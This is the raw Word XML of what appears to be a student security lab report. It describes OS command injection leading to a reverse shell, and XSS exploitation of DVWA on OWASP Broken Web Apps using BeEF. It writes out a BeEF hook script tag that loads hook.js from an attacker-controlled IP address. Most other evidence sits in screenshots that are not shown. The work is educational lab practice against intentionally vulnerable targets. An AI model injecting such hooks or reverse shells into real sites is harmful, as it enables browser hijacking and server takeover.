              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>caused a result that would have been the same if it was written in the terminal showing that his input is ran by a terminal</w:t>
            </w:r>
            <w:r w:rsidR="00471235">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> on the server. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E7883C9" w14:textId="77777777" w:rsidR="00471235" w:rsidRDefault="00471235" w:rsidP="004E3E9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2FD2A" w14:textId="0617E9FC" w:rsidR="003647E4" w:rsidRDefault="00E55958" w:rsidP="004E3E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erver will execute whatever input it is given as part of an OS command. This causes OS command injection vulnerability as </w:t>
            </w:r>
            <w:r w:rsidR="000E0006">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>attackers will be able to execute arbitrary operating system (OS) commands on the server.</w:t>
            </w:r>
            <w:r w:rsidR="000227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2019692" w14:textId="77777777" w:rsidR="003647E4" w:rsidRDefault="003647E4" w:rsidP="003A5306">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="720"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3249648C" w14:textId="41F10F74" w:rsidR="00051FD3" w:rsidRPr="002135A4" w:rsidRDefault="00051FD3" w:rsidP="00051FD3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77664CE2" w14:textId="57EAAC22" w:rsidR="00051FD3" w:rsidRDefault="00051FD3" w:rsidP="00051FD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AAD1062" w14:textId="77777777" w:rsidR="00051FD3" w:rsidRDefault="00051FD3" w:rsidP="00051F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4E192011" w14:textId="77777777" w:rsidR="00051FD3" w:rsidRPr="00051FD3" w:rsidRDefault="00051FD3" w:rsidP="00051FD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27D27B9" w14:textId="02EFC6F7" w:rsidR="00654130" w:rsidRDefault="008F11DF" w:rsidP="00B35376">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr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Kali Linux to p</w:t>
      </w:r>
      <w:r w:rsidR="00630C02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">erform </w:t>
      </w:r>
      <w:r w:rsidR="00BF5D1B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">an attack on </w:t>
      </w:r>
      <w:r w:rsidR="00B930EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00C65A8D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Hostname/IP </w:t>
      </w:r>
      <w:r w:rsidR="00961B8C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">field </w:t>
      </w:r>
      <w:r w:rsidR="006049DA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">shown in Figure 3(a) </w:t>
      </w:r>
      <w:r w:rsidR="00654130">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="00B66BFC" w:rsidRPr="0025031F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>spawn</w:t>
      </w:r>
      <w:r w:rsidR="00A74AB0" w:rsidRPr="0025031F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> a r</w:t>
      </w:r>
      <w:r w:rsidR="00A74AB0" w:rsidRPr="000239B9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">everse </w:t>
      </w:r>
      <w:r w:rsidR="00FB606B" w:rsidRPr="000239B9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidR="00FB606B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> on th</w:t>
      </w:r>
      <w:r w:rsidR="00E33010">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00FB606B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0082665B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">operating system running the </w:t>
      </w:r>
      <w:r w:rsidR="00FB606B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidR="00EE3D5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>site</w:t>
      </w:r>
      <w:r w:rsidR="00136C4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> identified </w:t>
      </w:r>
      <w:r w:rsidR="002930C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">shown </w:t>
      </w:r>
      <w:r w:rsidR="00136C4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r w:rsidR="002930C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00136C4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Q3(a)</w:t>
      </w:r>
      <w:r w:rsidR="00EE3D5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="000239B9" w:rsidRPr="00DE2EF7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Provide screenshot</w:t>
      </w:r>
      <w:r w:rsidR="000239B9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="000239B9" w:rsidRPr="00DE2EF7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000239B9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0239B9" w:rsidRPr="00DE2EF7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000239B9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="000239B9" w:rsidRPr="00E33010">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">command used to start a </w:t>
      </w:r>
      <w:r w:rsidR="00F41316" w:rsidRPr="00E33010">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">listener, webpage where the injection code is </w:t>
      </w:r>
      <w:r w:rsidR="00CA2DB8" w:rsidRPr="00E33010">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">submitted, </w:t>
      </w:r>
      <w:r w:rsidR="000239B9" w:rsidRPr="00E33010">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="00CA2DB8" w:rsidRPr="00E33010">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidR="000239B9" w:rsidRPr="00E33010">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> output</w:t>
      </w:r>
      <w:r w:rsidR="00CA2DB8" w:rsidRPr="00E33010">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> showing a successful </w:t>
      </w:r>
      <w:r w:rsidR="002970B7" w:rsidRPr="00E33010">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>functioning reverse shell</w:t>
      </w:r>
      <w:r w:rsidR="002970B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224BFBC1" w14:textId="5553674C" w:rsidR="00192667" w:rsidRPr="00DD5265" w:rsidRDefault="00DD5265" w:rsidP="00DD5265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5E1ECC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738"/>
      </w:tblGrid>
      <w:tr w:rsidR="002A6815" w14:paraId="132AA669" w14:textId="77777777" w:rsidTr="00571C69">
        <w:trPr>
          <w:trHeight w:val="9824"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8738" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59678F55" w14:textId="77777777" w:rsidR="0091589B" w:rsidRDefault="009746BC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6BC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7BA4F61" wp14:editId="1183F5B6">
                  <wp:extent cx="5732145" cy="1788795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8D2C5" w14:textId="6C97AC0B" w:rsidR="00855B1F" w:rsidRDefault="00855B1F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B1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1B0049B" wp14:editId="28AD6349">
                  <wp:extent cx="5732145" cy="3684905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68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4E2" w14:paraId="69D0A18D" w14:textId="77777777" w:rsidTr="00571C69">
        <w:trPr>
          <w:trHeight w:val="9824"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8738" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3EAD9475" w14:textId="77777777" w:rsidR="000354E2" w:rsidRDefault="000354E2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1486D" w14:textId="77777777" w:rsidR="000354E2" w:rsidRDefault="000354E2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4E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054E0D8" wp14:editId="76ABA5AD">
                  <wp:extent cx="5063067" cy="2233986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166" cy="223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A7CEB" w14:textId="77777777" w:rsidR="005E6E04" w:rsidRDefault="005E6E04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5880A" w14:textId="5D2997D3" w:rsidR="005E6E04" w:rsidRPr="009746BC" w:rsidRDefault="005E6E04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6E0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FB25FB5" wp14:editId="190E655E">
                  <wp:extent cx="5732145" cy="120459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E04" w14:paraId="1858DFB1" w14:textId="77777777" w:rsidTr="005E6E04">
        <w:trPr>
          <w:trHeight w:val="63"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8738" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A10FA23" w14:textId="77777777" w:rsidR="005E6E04" w:rsidRDefault="005E6E04" w:rsidP="00B8480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CE23F" w14:textId="77777777" w:rsidR="00571C69" w:rsidRDefault="00571C6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6151B689" w14:textId="29DEDE8F" w:rsidR="00E22791" w:rsidRPr="002135A4" w:rsidRDefault="00E22791" w:rsidP="00E22791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16D4A201" w14:textId="77777777" w:rsidR="00E22791" w:rsidRDefault="00E22791" w:rsidP="00E2279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657B9FB" w14:textId="77777777" w:rsidR="00E22791" w:rsidRDefault="00E22791" w:rsidP="00E2279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18AC899B" w14:textId="77777777" w:rsidR="00E22791" w:rsidRPr="00E22791" w:rsidRDefault="00E22791" w:rsidP="00E2279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BF54AD" w14:textId="28EFF591" w:rsidR="005F1B41" w:rsidRDefault="003510EB" w:rsidP="00861C7D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</w:t>
      </w:r>
      <w:r w:rsidR="004B470E" w:rsidRPr="003C56EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>BeEF</w:t>
      </w:r>
      <w:r w:rsidR="004B470E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> tool to </w:t>
      </w:r>
      <w:r w:rsidR="008C4B98">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>exploit XSS vulnerability in the DVWA website running under the OWASP Broken Web Apps (owaspbwa)</w:t>
      </w:r>
      <w:r w:rsidR="009272A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67458EF4" w14:textId="77777777" w:rsidR="005F1B41" w:rsidRPr="005F1B41" w:rsidRDefault="005F1B41" w:rsidP="005F1B4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3AA139A" w14:textId="3820AB17" w:rsidR="00861C7D" w:rsidRDefault="007B7C6C" w:rsidP="005F1B4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>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE2EF7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r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Pr="00DE2E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3145E1" w:rsidRPr="0082641C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">specific DVWA </w:t>
      </w:r>
      <w:r w:rsidRPr="0082641C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>webpage where the XXS</w:t>
      </w:r>
      <w:r w:rsidR="009D5DE7" w:rsidRPr="0082641C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerability could be exploited, the BeEF </w:t>
      </w:r>
      <w:r w:rsidR="00D55ACD" w:rsidRPr="0082641C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">XSS hook </w:t>
      </w:r>
      <w:r w:rsidRPr="0082641C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">code </w:t>
      </w:r>
      <w:r w:rsidR="00F9613A" w:rsidRPr="0082641C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">that needs to be </w:t>
      </w:r>
      <w:r w:rsidRPr="0082641C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>submitted, and the output showing a successful</w:t>
      </w:r>
      <w:r w:rsidR="00904834" w:rsidRPr="0082641C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>ly</w:t>
      </w:r>
      <w:r w:rsidRPr="0082641C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F01BF9" w:rsidRPr="0082641C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>hook</w:t>
      </w:r>
      <w:r w:rsidR="00904834" w:rsidRPr="0082641C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidR="00F01BF9" w:rsidRPr="0082641C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> browser inside the BeEF user interface / dashboard</w:t>
      </w:r>
      <w:r w:rsidR="00F01BF9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00BA016C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F14601" w14:textId="6C2E3248" w:rsidR="002F6158" w:rsidRPr="002F6158" w:rsidRDefault="002F6158" w:rsidP="002F6158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A547D6" w14:paraId="2FBF9337" w14:textId="77777777" w:rsidTr="00A547D6">
        <w:trPr>
          <w:trHeight w:val="3691"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9017" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F146CED" w14:textId="7DEAEEB4" w:rsidR="00A547D6" w:rsidRDefault="00E712D8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12D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CF42B4A" wp14:editId="0E2D60E5">
                  <wp:extent cx="5732145" cy="3113405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311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47477" w14:textId="5A2A86BF" w:rsidR="00E712D8" w:rsidRDefault="00E712D8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8040C7" w14:textId="77777777" w:rsidR="00E712D8" w:rsidRDefault="00E712D8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A04601" w14:textId="7B69C451" w:rsidR="00821D55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33AA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>&lt;script src="http://192.168.184.136:3000/hook.js"&gt;&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="239D5DED" w14:textId="6729025F" w:rsidR="00286911" w:rsidRDefault="00286911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CD5F9" w14:textId="3464B87B" w:rsidR="00286911" w:rsidRDefault="00286911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6911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17061895" wp14:editId="5FE9D40F">
                  <wp:extent cx="5732145" cy="4073525"/>
                  <wp:effectExtent l="0" t="0" r="190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07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A2854" w14:textId="2DBA18BA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5354EF" w14:textId="77777777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461829" w14:textId="18199D43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2C7F1" w14:textId="77777777" w:rsidR="004233AA" w:rsidRDefault="004233AA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85DEC2" w14:textId="0DA39538" w:rsidR="00821D55" w:rsidRDefault="00821D55" w:rsidP="005F1B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FE1667" w14:textId="77777777" w:rsidR="005F1B41" w:rsidRPr="005F1B41" w:rsidRDefault="005F1B41" w:rsidP="005F1B41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203B18C" w14:textId="585064D3" w:rsidR="005F1B41" w:rsidRDefault="001C6A81" w:rsidP="005F1B41">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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BeEF interface / dashboard </w:t>
      </w:r>
      <w:r w:rsidR="00D9551D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">to mount </w:t>
      </w:r>
      <w:r w:rsidR="00BC2B85" w:rsidRPr="00BC2B85">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">any </w:t>
      </w:r>
      <w:r w:rsidR="00BC2B85">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ONE of the post</w:t>
      </w:r>
      <w:r w:rsidR="00BA016C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="008E3C92">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">exploitation attacks </w:t>
      </w:r>
      <w:r w:rsidR="00B0028E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>on the hooked browser.</w:t>
      </w:r>
      <w:r w:rsidR="00D9551D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Provide screenshot </w:t>
      </w:r>
      <w:r w:rsidR="00D9551D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D9551D" w:rsidRPr="00D9551D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D9551D" w:rsidRPr="007B54B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00B27F74" w:rsidRPr="007B54B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>attack setup in the BeEF interface / dashboard and the successful attack output on the hooked browser</w:t>
      </w:r>
      <w:r w:rsidR="00B27F74">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00BA016C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08891A38" w14:textId="0F1E1DD2" w:rsidR="00906578" w:rsidRPr="00906578" w:rsidRDefault="00906578" w:rsidP="00906578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A547D6" w14:paraId="68A7DB03" w14:textId="77777777" w:rsidTr="00A547D6">
        <w:trPr>
          <w:trHeight w:val="3895"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9017" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="703B82DD" w14:textId="77777777" w:rsidR="00A547D6" w:rsidRDefault="005B1A46" w:rsidP="005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A46">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B8076E5" wp14:editId="7DB530DC">
                  <wp:extent cx="5609860" cy="3158066"/>
                  <wp:effectExtent l="0" t="0" r="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56" cy="316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71846" w14:textId="77777777" w:rsidR="00F6251A" w:rsidRDefault="00F6251A" w:rsidP="005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C625E0" w14:textId="0AD493CA" w:rsidR="00F6251A" w:rsidRDefault="00F6251A" w:rsidP="005B43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51A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8365D8A" wp14:editId="78AF3EFA">
